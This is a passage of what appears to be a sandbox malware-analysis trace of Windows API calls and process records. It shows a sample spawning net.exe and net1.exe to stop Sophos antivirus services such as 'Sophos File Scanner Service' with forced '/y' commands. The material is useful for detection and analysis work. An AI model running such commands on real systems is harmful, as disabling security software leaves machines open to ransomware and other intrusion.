_String2="Sophos Clean Service") returned 4 [0082.245] _wcsicmp (_String1="work", _String2="Sophos Clean Service") returned 4 [0082.245] _wcsicmp (_String1="wksta", _String2="Sophos Clean Service") returned 4 [0082.245] _wcsicmp (_String1="prdr", _String2="Sophos Clean Service") returned -3 [0082.245] _wcsicmp (_String1="devrdr", _String2="Sophos Clean Service") returned -15 [0082.245] _wcsicmp (_String1="lanmanworkstation", _String2="Sophos Clean Service") returned -7 [0082.245] _wcsicmp (_String1="server", _String2="Sophos Clean Service") returned -10 [0082.245] _wcsicmp (_String1="svr", _String2="Sophos Clean Service") returned 7 [0082.245] _wcsicmp (_String1="srv", _String2="Sophos Clean Service") returned 3 [0082.245] _wcsicmp (_String1="lanmanserver", _String2="Sophos Clean Service") returned -7 [0082.245] _wcsicmp (_String1="alerter", _String2="Sophos Clean Service") returned -18 [0082.245] _wcsicmp (_String1="netlogon", _String2="Sophos Clean Service") returned -5 [0082.245] _wcsupr (in: _String="Sophos Clean Service" | out: _String="SOPHOS CLEAN SERVICE") returned="SOPHOS CLEAN SERVICE" [0082.246] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x16ce40 [0082.249] GetServiceKeyNameW (in: hSCManager=0x16ce40, lpDisplayName="SOPHOS CLEAN SERVICE", lpServiceName=0xffdf5750, lpcchBuffer=0xef748 | out: lpServiceName="", lpcchBuffer=0xef748) returned 0 [0082.250] _wcsicmp (_String1="msg", _String2="SOPHOS CLEAN SERVICE") returned -6 [0082.250] _wcsicmp (_String1="messenger", _String2="SOPHOS CLEAN SERVICE") returned -6 [0082.250] _wcsicmp (_String1="receiver", _String2="SOPHOS CLEAN SERVICE") returned -1 [0082.250] _wcsicmp (_String1="rcv", _String2="SOPHOS CLEAN SERVICE") returned -1 [0082.250] _wcsicmp (_String1="redirector", _String2="SOPHOS CLEAN SERVICE") returned -1 [0082.250] _wcsicmp (_String1="redir", _String2="SOPHOS CLEAN SERVICE") returned -1 [0082.250] _wcsicmp (_String1="rdr", _String2="SOPHOS CLEAN SERVICE") returned -1 [0082.250] _wcsicmp (_String1="workstation", _String2="SOPHOS CLEAN SERVICE") returned 4 [0082.250] _wcsicmp (_String1="work", _String2="SOPHOS CLEAN SERVICE") returned 4 [0082.250] _wcsicmp (_String1="wksta", _String2="SOPHOS CLEAN SERVICE") returned 4 [0082.250] _wcsicmp (_String1="prdr", _String2="SOPHOS CLEAN SERVICE") returned -3 [0082.250] _wcsicmp (_String1="devrdr", _String2="SOPHOS CLEAN SERVICE") returned -15 [0082.250] _wcsicmp (_String1="lanmanworkstation", _String2="SOPHOS CLEAN SERVICE") returned -7 [0082.250] _wcsicmp (_String1="server", _String2="SOPHOS CLEAN SERVICE") returned -10 [0082.250] _wcsicmp (_String1="svr", _String2="SOPHOS CLEAN SERVICE") returned 7 [0082.250] _wcsicmp (_String1="srv", _String2="SOPHOS CLEAN SERVICE") returned 3 [0082.250] _wcsicmp (_String1="lanmanserver", _String2="SOPHOS CLEAN SERVICE") returned -7 [0082.250] _wcsicmp (_String1="alerter", _String2="SOPHOS CLEAN SERVICE") returned -18 [0082.250] _wcsicmp (_String1="netlogon", _String2="SOPHOS CLEAN SERVICE") returned -5 [0082.250] NetServiceControl (in: servername=0x0, service="SOPHOS CLEAN SERVICE", opcode=0x0, arg=0x0, bufptr=0xef750 | out: bufptr=0xef750) returned 0x889 [0082.251] wcscpy_s (in: _Destination=0xffdf80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0082.251] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0082.252] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffdf5b50, nSize=0x800, Arguments=0xffdf7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0082.253] GetFileType (hFile=0xb) returned 0x2 [0082.317] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xef618 | out: lpMode=0xef618) returned 1 [0082.317] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdf5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xef610, lpReserved=0x0 | out: lpBuffer=0xffdf5b50*, lpNumberOfCharsWritten=0xef610*=0x1e) returned 1 [0082.317] GetFileType (hFile=0xb) returned 0x2 [0082.317] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xef618 | out: lpMode=0xef618) returned 1 [0082.317] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdd1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xef610, lpReserved=0x0 | out: lpBuffer=0xffdd1efc*, lpNumberOfCharsWritten=0xef610*=0x2) returned 1 [0082.318] _ultow (in: _Dest=0x889, _Radix=980608 | out: _Dest=0x889) returned="2185" [0082.318] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffdf5b50, nSize=0x800, Arguments=0xffdf7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0082.318] GetFileType (hFile=0xb) returned 0x2 [0082.318] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xef618 | out: lpMode=0xef618) returned 1 [0082.318] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdf5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xef610, lpReserved=0x0 | out: lpBuffer=0xffdf5b50*, lpNumberOfCharsWritten=0xef610*=0x34) returned 1 [0082.318] GetFileType (hFile=0xb) returned 0x2 [0082.319] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xef618 | out: lpMode=0xef618) returned 1 [0082.319] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffdd1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xef610, lpReserved=0x0 | out: lpBuffer=0xffdd1efc*, lpNumberOfCharsWritten=0xef610*=0x2) returned 1 [0082.319] NetApiBufferFree (Buffer=0x164d60) returned 0x0 [0082.319] NetApiBufferFree (Buffer=0x16c130) returned 0x0 [0082.319] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Sophos Clean Service\" /y" [0082.319] exit (_Code=2) Process: id = "60" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x23974000" os_pid = "0xde4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"Sophos Health Service\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3967 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3968 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3969 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3970 start_va = 0x1b0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3971 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3972 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3973 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3974 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 3975 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3976 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3977 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 3978 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3979 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3980 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3981 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 392 os_tid = 0xdf0 Process: id = "61" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x23998000" os_pid = "0xe60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop \"Sophos MCS Agent\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3982 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3983 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3984 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3985 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 3986 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3987 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3988 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3989 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 3990 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3991 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3992 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 3993 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 3994 start_va = 0x80000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 3995 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3996 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 394 os_tid = 0xe74 Process: id = "62" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x240dd000" os_pid = "0xedc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "57" os_parent_pid = "0xc8c" cmd_line = "C:\\Windows\\system32\\net1 stop \"Sophos File Scanner Service\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3997 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3998 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3999 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4000 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 4001 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4002 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4003 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4004 start_va = 0xffdd0000 end_va = 0xffe02fff entry_point = 0xffdd0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 4005 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4006 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 4007 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 4008 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 4009 start_va = 0x80000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 4010 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4011 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4012 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4013 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4014 start_va = 0x70000 end_va = 0x7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 4015 start_va = 0x180000 end_va = 0x1e6fff entry_point = 0x180000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4016 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 4017 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4018 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4019 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 4020 start_va = 0x7fef8ed0000 end_va = 0x7fef8ee1fff entry_point = 0x7fef8ed0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 4021 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 4022 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 4023 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 4024 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4025 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 4026 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 4027 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 4028 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 4029 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4030 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4031 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4032 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4033 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4034 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4035 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 396 os_tid = 0xef8 [0082.499] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fb70 | out: lpSystemTimeAsFileTime=0x28fb70*(dwLowDateTime=0xe657eaf0, dwHighDateTime=0x1d48689)) [0082.499] GetCurrentProcessId () returned 0xedc [0082.499] GetCurrentThreadId () returned 0xef8 [0082.499] GetTickCount () returned 0x1e82c [0082.499] QueryPerformanceCounter (in: lpPerformanceCount=0x28fb78 | out: lpPerformanceCount=0x28fb78*=1812941800000) returned 1 [0082.501] GetModuleHandleW (lpModuleName=0x0) returned 0xffdd0000 [0082.501] __set_app_type (_Type=0x1) [0082.501] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffde9c9c) returned 0x0 [0082.501] __getmainargs (in: _Argc=0xffdf4780, _Argv=0xffdf4790, _Env=0xffdf4788, _DoWildCard=0, _StartInfo=0xffdf479c | out: _Argc=0xffdf4780, _Argv=0xffdf4790, _Env=0xffdf4788) returned 0 [0082.501] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0082.501] GetConsoleOutputCP () returned 0x1b5 [0082.501] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffdfcec0 | out: lpCPInfo=0xffdfcec0) returned 1 [0082.501] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0082.503] sprintf_s (in: _DstBuf=0x28fb18, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0082.503] setlocale (category=0, locale=".437") returned="English_United States.437" [0082.504] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0082.504] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0082.504] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Sophos File Scanner Service\" /y" [0082.504] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x28f8b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0082.505] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0082.505] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x28fb08 | out: Buffer=0x28fb08*=0x9c100) returned 0x0 [0082.505] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x28fb08 | out: Buffer=0x28fb08*=0x9c120) returned 0x0 [0082.505] _fileno (_File=0x7fefdba2a80) returned 0 [0082.505] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0082.505] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0082.505] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0082.505] _wcsicmp (_String1="config", _String2="stop") returned -16 [0082.505] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0082.505] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0082.505] _wcsicmp (_String1="file", _String2="stop") returned -13 [0082.505] _wcsicmp (_String1="files", _String2="stop") returned -13 [0082.505] _wcsicmp (_String1="group", _String2="stop") returned -12 [0082.505] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0082.505] _wcsicmp (_String1="help", _String2="stop") returned -11 [0082.505] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0082.505] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0082.505] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0082.505] _wcsicmp (_String1="session", _String2="stop") returned -15 [0082.505] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0082.505] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0082.505] _wcsicmp (_String1="share", _String2="stop") returned -12 [0082.505] _wcsicmp (_String1="start", _String2="stop") returned -14 [0082.505] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0082.505] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0082.505] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0082.506] _wcsicmp (_String1="accounts", _String2="Sophos File Scanner Service") returned -18 [0082.506] _wcsicmp (_String1="computer", _String2="Sophos File Scanner Service") returned -16 [0082.506] _wcsicmp (_String1="config", _String2="Sophos File Scanner Service") returned -16 [0082.506] _wcsicmp (_String1="continue", _String2="Sophos File Scanner Service") returned -16 [0082.506] _wcsicmp (_String1="cont", _String2="Sophos File Scanner Service") returned -16 [0082.506] _wcsicmp (_String1="file", _String2="Sophos File Scanner Service") returned -13 [0082.506] _wcsicmp (_String1="files", _String2="Sophos File Scanner Service") returned -13 [0082.506] _wcsicmp (_String1="group", _String2="Sophos File Scanner Service") returned -12 [0082.506] _wcsicmp (_String1="groups", _String2="Sophos File Scanner Service") returned -12 [0082.506] _wcsicmp (_String1="help", _String2="Sophos File Scanner Service") returned -11 [0082.506] _wcsicmp (_String1="helpmsg", _String2="Sophos File Scanner Service") returned -11 [0082.506] _wcsicmp (_String1="localgroup", _String2="Sophos File Scanner Service") returned -7 [0082.506] _wcsicmp (_String1="pause", _String2="Sophos File Scanner Service") returned -3 [0082.506] _wcsicmp (_String1="session", _String2="Sophos File Scanner Service") returned -10 [0082.506] _wcsicmp (_String1="sessions", _String2="Sophos File Scanner Service") returned -10 [0082.506] _wcsicmp (_String1="sess", _String2="Sophos File Scanner Service") returned -10 [0082.506] _wcsicmp (_String1="share", _String2="Sophos File Scanner Service") returned -7 [0082.506] _wcsicmp (_String1="start", _String2="Sophos File Scanner Service") returned 5 [0082.506] _wcsicmp (_String1="stats", _String2="Sophos File Scanner Service") returned 5 [0082.506] _wcsicmp (_String1="statistics", _String2="Sophos File Scanner Service") returned 5 [0082.506] _wcsicmp (_String1="stop", _String2="Sophos File Scanner Service") returned 5 [0082.506] _wcsicmp (_String1="time", _String2="Sophos File Scanner Service") returned 1 [0082.506] _wcsicmp (_String1="user", _String2="Sophos File Scanner Service") returned 2 [0082.506] _wcsicmp (_String1="users", _String2="Sophos File Scanner Service") returned 2 [0082.506] _wcsicmp (_String1="msg", _String2="Sophos File Scanner Service") returned -6 [0082.506] _wcsicmp (_String1="messenger", _String2="Sophos File Scanner Service") returned -6 [0082.506] _wcsicmp (_String1="receiver", _String2="Sophos File Scanner Service") returned -1 [0082.506] _wcsicmp (_String1="rcv", _String2="Sophos File Scanner Service") returned -1 [0082.506] _wcsicmp (_String1="netpopup", _String2="Sophos File Scanner Service") returned -5 [0082.506] _wcsicmp (_String1="redirector", _String2="Sophos File Scanner Service") returned -1 [0082.506] _wcsicmp (_String1="redir", _String2="Sophos File Scanner Service") returned -1 [0082.506] _wcsicmp (_String1="rdr", _String2="Sophos File Scanner Service") returned -1 [0082.506] _wcsicmp (_String1="workstation", _String2="Sophos File Scanner Service") returned 4 [0082.506] _wcsicmp (_String1="work", _String2="Sophos File Scanner Service") returned 4 [0082.506] _wcsicmp (_String1="wksta", _String2="Sophos File Scanner Service") returned 4 [0082.506] _wcsicmp (_String1="prdr", _String2="Sophos File Scanner Service") returned -3 [0082.506] _wcsicmp (_String1="devrdr", _String2="Sophos File Scanner Service") returned -15 [0082.506] _wcsicmp (_String1="lanmanworkstation", _String2="Sophos File Scanner Service") returned -7 [0082.506] _wcsicmp (_String1="server", _String2="Sophos File Scanner Service") returned -10 [0082.506] _wcsicmp (_String1="svr", _String2="Sophos File Scanner Service") returned 7 [0082.506] _wcsicmp (_String1="srv", _String2="Sophos File Scanner Service") returned 3 [0082.506] _wcsicmp (_String1="lanmanserver", _String2="Sophos File Scanner Service") returned -7 [0082.507] _wcsicmp (_String1="alerter", _String2="Sophos File Scanner Service") returned -18 [0082.507] _wcsicmp (_String1="netlogon", 